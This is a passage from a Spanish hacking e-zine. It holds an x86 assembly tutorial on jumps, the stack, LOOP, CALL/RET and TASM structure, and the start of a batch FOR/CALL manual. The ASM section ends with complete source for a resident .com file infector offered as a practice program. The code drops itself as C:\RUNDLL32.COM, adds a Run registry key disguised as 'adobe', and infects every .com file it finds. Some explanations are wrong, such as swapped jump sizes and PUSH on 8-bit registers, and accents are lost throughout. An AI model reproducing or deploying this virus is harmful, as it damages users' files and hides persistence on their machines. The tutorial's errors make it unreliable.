    Introduccion Al ASM II CUH e-zine 3 Edicion programa, a estas les llamaremos "sentencias condicionales", ya que toman en cuenta el cumplimiento de una condicin para seguir con la siguiente; entre estos comandos podemos ver: el "if"(como principal); while; until; etc. En asm tambin tenemos mnemonicos condicionales, los cuales cada uno de ellos representa una condicin especifica. Como principal ejemplo tenemos a los saltos. Estos saltos estan condicionados por los valores que poseen las "flags" (registros especiales que vimos en el 1er tuto). Como ya hemos vistos, el mnemonico "jmp" ~ jump ~ saltar.. se utiliza para saltar a una posicin especifica de memoria determinada ya sea por una etiqueta(en leguajes de macro como en el "TASM") o por una direccin de offset. Tcnicamente esto lo hace incrementando el valor de IP (Puntero de Instruccin). Equivale a un GOTO. Ejemplos: JMP 0046D24C ;salta a CS:0046D24C. JMP etq1 ;salta a la etiqueta "etq1" dentro del macro. . Hay varias derivaciones segn la activacin de diferentes flags. As las derivaciones son: Hexadecimal Assembler Significa 75 o 0F85 Jne Salta si no es equivalente74 o 0F84 Je Salta si es equivalenteEB Jmp Salta directamente a . . .

    90 Nop ( No OPeration ) Sin operacin

    77 o 0F87 Ja Salta si esta sobre OF86 Jna Salta si no esta sobre0F83 Jae Salta si esta sobre o igual

    0F82 Jnae Salta si no esta sobre o igual

    0F82 Jb Salta si es inferior 0F83 Jnb Salta si no es inferior

    0F86 Jbe Salta si esta debajo o igual

    0F87 Jnbe Salta si no esta debajo o igual

    0F8F Jg Salta si es mayor 0F8E Jng Salta si no es mayor 0F8D Jge Salta si es mayor o igual

    0F8C Jnge Salta si no es mayor o igual 0F8C Jl Salta si es menor 0F8D Jnl Salta si no es menor 0F8E Jle Salta si es menor o igual

    0F8F Jnle Salta si no es menor o igual

    tabla sacada de la red En la tabla podemos ver el cdigo en hexadecimal, el mnemnico y su significado. Weno, para tenerlo mas claro veremos un ejemplo: MOV DX,00 ;dx==00 INI: INC DX ;incrementa el valor dx en 1 dx+1 CMP DX,05 ;compara dx con 05 JE FOK ;si dx=05 salta a la etiqueta FOK JMP INI ;sino salta a la etiqueta INI FOK: MOV AH,4C ;ah==4C Lo que akabamos de ver es un simple bucle que establece el valor de dx en 00 luego cuando entra en la etiqueta ini, se incrementa el valor de dx, o sea que, si antes de entrar en la etiqueta dx era 00 despus del INC DX, dx tomaba el valor de 01 y as sucesivamente mientras se mantuviera en el bucle, luego de que el valor de dx se incrementa, este se compara con el valor 05, si la flan equal se activa, entonces salta a la etiqueta FOK, sino vuelva a INI. Esto es algo que veremos muy frecuente en ingeniera inversa. 3.1-Saltos cortos, cercanos y largos. Hay veces que necesitamos indicar que tipo de salto realizaremos dependiendo de tan lejos saltaremos. JMP SHORT ~ Salto corto: Se realiza si vamos a saltar a una direccin comprendida entre lo q puede dos bytes (-128 a +127 antes o despus de IP actual). 00402207 JMP SHORT 402100 JMP NEAR ~ Salto cercano: Se realiza si vamos a saltar a una direccin comprendida entre lo q puede un byte (-32768 a +32767 antes o despus de IP actual). 00402207 JMP NEAR 404010

    Un salto largo es ya cuando se tiene como distancia el contenido de 4 bytes. Este tipo de saltos se ven cuando un programa llama a una funcin de un modulo. Por ejemplo para saltar a USER32.GetDlgItemTextA desde el app.00401171: ------------------------------------------app.exe----------

  • Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion 00401171 JMP DWORD PTR DS:[] --------------------------------------------------------------- Algo que tenemos que tomar en cuenta es que las especificaciones de corto, cercano y lejano, tambin debemos especificarlas en las dems derivaciones de saltos (los condicionales), claro, cuando sea necesario. 4- Instrucciones PUSH y POP. La PILA o STACK Para empezar con esto, tengamos este diagrama en mente: PUSH Y = mete el valor de Y en el almacn POP X = saca y guarda, el ultimo valor metido en el almacn, en X Almacn = | | | | | | | _ _ | A = 1 B = 2 C = 3 D = 0 PUSH A | | | | | | | _1_ | PUSH C | | | | | 3 | | _1_ | PUSH B | | | 2 | | 3 | | _1_ | POP D . . . . . . . . D = 2 . : | : | | | | 2 | | | | 3 | | 3 | | _1_ | | _1_ | Ahora veamos como se vera este diagrama en asm: MOV AH,01 ;AH=01 MOV AL,02 ;Al=02 MOV DH,03 ;DH=03 MOV DL,00 ;DL=0

    PUSH AH ;AH a stack PUSH DH ;DH a stack PUSH AL ;AL a stack POP DL ;recordemos q el ultimo valor en entrar a la pila fue el de AL, y AL vale 02 asiq DL=02 Por si acaso: PUSH X ~ Meter: Mete el valor de el registro X en la pila POP Y ~ Sacar: Saca y guarda en el registro Y el ultimo valor introducido en la pila. La pila es como un almacn donde se guardan valores de los registros. Recordemos que la direccin de la pila esta especificada por los registros: SS:SP (Stack Segment:Stack Pointer ~ Segmento de la pila:Puntero actual de la pila). 5- Instruccin LOOP Weno esencialmente, esta instruccin la usaremos a la hora de crear bucles y no qeremos meternos con mov-inc-cmp-jne. Bsicamente lo que hace LOOP es comparar CX con 0 si CX=0 entoncs continua con la siguiente instruccin si no vuelve a su parmetro. LOOP decrementa el valor de CX cada ves que IP se ubica en el. -Su sintaxis es: LOOP PARAM -- donde PARAM es la instruccin a la cual volvera IP si CX no es igual a 0 Ejemplo: MOV CX,05h INI: LOOP INI FOK: 6- Instrucciones CALL Y RET: La orden CALL equivale a un CALL en batch. Y RET equivale a GOTO :EOF en batch. Su sintaxis es como la del JMP, se permiten etiquetas, registros, direcciones de memoria. CALL lo que hace es introducir IP+1 en la pila, o sea la instruccin que sigue al CALL, y salta a la direccin que se le indica, RET toma el valor que introduce el CALL en la pila, y salta a el. Ejemplo en Batch: SET NOMBRE=JORGE CALL :EC %NOMBRE% EXIT :EC

  • Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion ECHO %1 GOTO :EOF Ejemplo en ASM: NOM DB "JORGE$" .CODE INI: MOV AX,@DATA MOV DS,AX MOV DX,OFFSET NOM MOV AH,9 CALL XXI JMP OTER XXI: INT 21H RET 6- Funciones dentro de un programa escrito en TASM. En lenguajes como el BASIC, tenemos la opcin de tener subrutinas las cuales podemos llamar en cualquier momento asi podemos ver en BASIC: Sub sumd(Dim var as Integer) var = var + 1 End Sub

    En TASM tambin podemos tener funciones. As podemos ver el ejemplo en BASIC en TASM: sumd macro var mov dx, var inc dx ENDM

    Donde sumd es el nombre del macro, macro especifica que una funcin y var se refiere a el argumento de la llamada. Las funciones se deben especificar antes de el cdigo (segmento .code o .text). 7- Estructura de un ejecutable escrito en TASM (2da forma) En el tuto anterior aprendimos una forma de estructura para crear un programa con TASM mediante la definicin concreta de los segmentos de cdigo, esta vez aprenderemos otra forma en la cual asumiremos los segmentos en el proceso principal. Sintaxis A (Estableciendo todos los segmentos): --------------------------------------------------------------- ;definicin de constantes y modelo ;macros ------------------------------------stack--------------------- stac SEGMENT PARA STACK 'stack'

    ;definicin de buffer stac ENDS ------------------------------------segmento .data--------- data SEGMENT PARA PUBLIC ;definicin de valores data ENDS ------------------------------------segmento .code--------- codi SEGMENT PARA PUBLIC 'code' prin PROC FAR ASSUME CS:codi, DS:data, SS:stac, ES:eseg ;codigo del programa prin ENDP codi ENDS prin END ------------------------------------segmento extra--------- eseg SEGMENT PARA PUBLIC ;cdigo Eseg ENDS --------------------------------------FIN--------------------- Sintaxis B (Asumiendo segmentos sin definirlos todos): --------------------------------------------------------------- ;definicin de constantes y modelo ;macros ------------------------------------segmento .code--------- codi SEGMENT PARA PUBLIC 'code' prin PROC FAR ASSUME CS:codi, DS:codi, ES:codi ;codigo del programa prin ENDP codi ENDS prin END -------------------------------------FIN---------------------- Nota: Si no necesitamos establecer la pila, bien podemos omitir su inclusin en el programa. 8- Programa de practica: Weno como programa de practica haremos un code algo rebuskdo pero q en fin nos ayudara a ver algunas estructuras que vimos en este tuto, adems de algunos servicios de la int 21h y una inclusin para los q somos batch coderz, como podemos fusionar un archivo .bat y uno .com! .. xD .286 ;especificamos el modelo prog segment byte public 'CODE' assume cs:prog, es:prog, ds:prog ;definimos segmentos org 100h ini: ;escribimos el codigo batch q se ejecutara en .bat db '@ECHO OFF',0dh,0ah db ':' jmp hma

  • Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion ;cuando se ejecuta el .com aki saltamos al area virica db 0dh,0ah db 'COPY %0.BAT ' virr_com: db 'C:\RUNDLL32.COM' db '>NUL',0dh,0ah db'reg add HKLM\software\microsoft\windows\currentversion\run /v adobe /d "C:\RUNDLL32.COM" /f',0dh,0ah db 'C:\RUNDLL32.COM',0dh,0ah db 1ah copi label byte ;aki especificamos donde comienza el fragmento a copiar arch: db "*.com",0 ;especificamos el tipo de archivos a infectar hma proc near mov di,0ffffh mov bx,copif-a_hma+05h mov ax,4a02h ;ya estamos residentes? int 2fh inc di jz salr ;si ya estamos residentes, nos vamos push di cld ;flag de acarreo a 0 mov si,offset a_hma ;comienza desde el offset de a_hma mov cx, copif-a_hma ;cantidad a pasar rep movsb ;pedimos residencia en hma hma endp a_hma label byte codi proc near mov ah,04eh ; servicio 4eh (buscar primer archivo del directorio actual) lea dx,arch ; CX = atributos int 21h ; DS:DX -> filespec ;(en nuestro caso: archive ~ *.com) enc_arch: mov ax,3d02h ; servicio 3dh (Abrir archivo) mov dx,9eh ; DS:DX -> nombre del archivo (en nuestro caso usamos el 9eh~dta del 4eh) int 21h ; AL = modo de apertura .. 2 leer y escribir copir_arch: mov cx,copif-copi ; servicio 40h (escribir en archivo) lea dx,copi ; CX = numero de bytes a escribir mov ah,40h ; DS:DX -> buffer int 21h mov ah,3eh ;servicio 3eh

    (cerrar archivo) int 21h cont: mov ah,4fh ;servicio 4fh (buscar siguiente archivo) int 21h jnb enc_arch ;si existen mas archivos, los infectamos, sino terminamos salr: int 20h ;devolvemos control copif label byte ; lo usamos para cuestiones del cantidad de bytes a copiar codi endp prog ends end ini El programa es un infectador de archivos .com residente, el programa es bastante sencillo pero nos ayudara a tener algunos conceptos en orden, adems que vemos la tcnica de residencia por hma (high memory acess) y algunos servicios de manejo de archivos, si bien no se pudo explikr bien el programa a sido por cuestiones de espacio e intentando que el lector desarrolle la habilidad de investigar, corregir errores y analizar.

    Me conformo con q un 70% haya podido ser comprendido =D .. Saludos y hasta la prxima!

    The Shadow

  • Programacion

    Manual Batch CUH e-zine 3 Edicion

    Manual de Batch By Espectro Infernal

    MANUAL UTILIDAD FOR + CALL + ETIQUETA Bueno, en este manual voy a explicar uno de los usos ms frecuentes y habituales en el

    comando FOR. Es una utilidad fcil de aprender (si ya se sabe manejar con

    las funcionalidades bsicas del FOR) y a la vez, muy til. Saber utilizar correctamente y con ingenio esta utilidad, como en todas las utilidades del FOR, nos ayudar a programar mejor nuestros proyectos. Cuando digo programar mejor, me refiero a hacer un code ms legible, con menos lneas, ms preciso, limpio, profesional. En este manual no voy a ensear a como usar el FOR, doy por entendido que si quieres usar esta utilidad sencilla ya sabes usar el FOR de manera sencilla, como mnimo. De este modo, quiero hacer un manual ms o menos corto, didctico, sencillo, y sobretodo, que se entienda y aprendan algo.

    Para empezar vamos a ver la estructura que tiene este FOR: FOR [/L, /F, /R] [CRITERIOS] %%VARIABLE IN (CONJUNTO) DO COMANDO [PARAMETROS] Digamos que la parte en negrita es la que nosotros tendremos que introducir segn lo que queramos hacer, estas partes pueden estar en corchetes (lo cual significa que no son obligatorias pero en la medida de lo posible, deberamos usarlas siempre para ser ms precisos con nuestro cdigo) y la parte subrayada es la que es totalmente obligatoria. Todo esto supongo que ya lo saben. Tmenlo como una pequea introduccin. Ahora voy a explicarles que mtodo vamos a tratar y porque lo usaremos, sus ventajas, etc. Vamos a usar un mtodo en el que podremos usar cualquier variedad del FOR (/F, /R, /L) y nuestra parte fundamental ser el uso del CALL como comando. Que ventajas tiene CALL en frente a GOTO? Bien, principalmente, en el uso de CALL para llamar una etiqueta, podemos usar parmetros por lo que podremos trabajar con lo que el FOR est

    trabajando en un momento de la ejecucin del flujo de cdigo. Adems, podemos usar el GOTO :EOF en la llamada a una etiqueta, con CALL para que

    vuelva a la lectura de cdigo despus de la llamada a la etiqueta y no acabe con el cdigo. Vamos a entender esto mejor:

    @ECHO ON ECHO HOLA GOTO :SALUDO PAUSE MSG FIN :SALUDO ECHO ADIOS PAUSE GOTO :EOF Como podemos ver, al llegar a la etiqueta saludo, nos escribe el mensaje adis y hace GOTO :EOF que lo tomaremos como un END. Se acaba el programa. Ahora vamos a utilizar el mismo code pero la llamada a la etiqueta la haremos con CALL: @ECHO ON ECHO HOLA CALL :SALUDO PAUSE MSG FIN :SALUDO ECHO ADIOS PAUSE GOTO :EOF En este caso llega al GOTO :EOF y lo que hace es volver al code desde la lnea donde se llamo a la etiqueta, de este modo que el resto del cdigo (MSG * ) sigue en curso. Esta es la clave principal para entender el uso del FOR con el CALL y ver las utilidades que esto tiene. En el caso de este code, el primer GOTO :EOF que se ejecute, funcionar correctamente, volver a la lnea despus de la llamada a la etiqueta y leer el MSG, pero luego, por lgica, volvera a leer la etiqueta ya que no hay ninguna instruccin que enve el flujo de cdigo a otro lado. La segunda vez que se ejecute GOTO :EOF no nos devolver a la llamada de la etiqueta porque est no fue llamada, simplemente se ley porque el orden del cdigo era ese. Es importante darse cuenta del funcionamiento que tiene CALL pues ahora vamos a empezar con una de la sutilidades que tiene usar el FOR+CALL+ETIQUETA y luego usar el FOR+CALL+ETIQUETA+PARMETROS, que es la ms til de las que voy a explicar en este manual, lgicamente. Ya que el paso de parmetros a una etiqueta llamndola con CALL es una gran

  • Programacion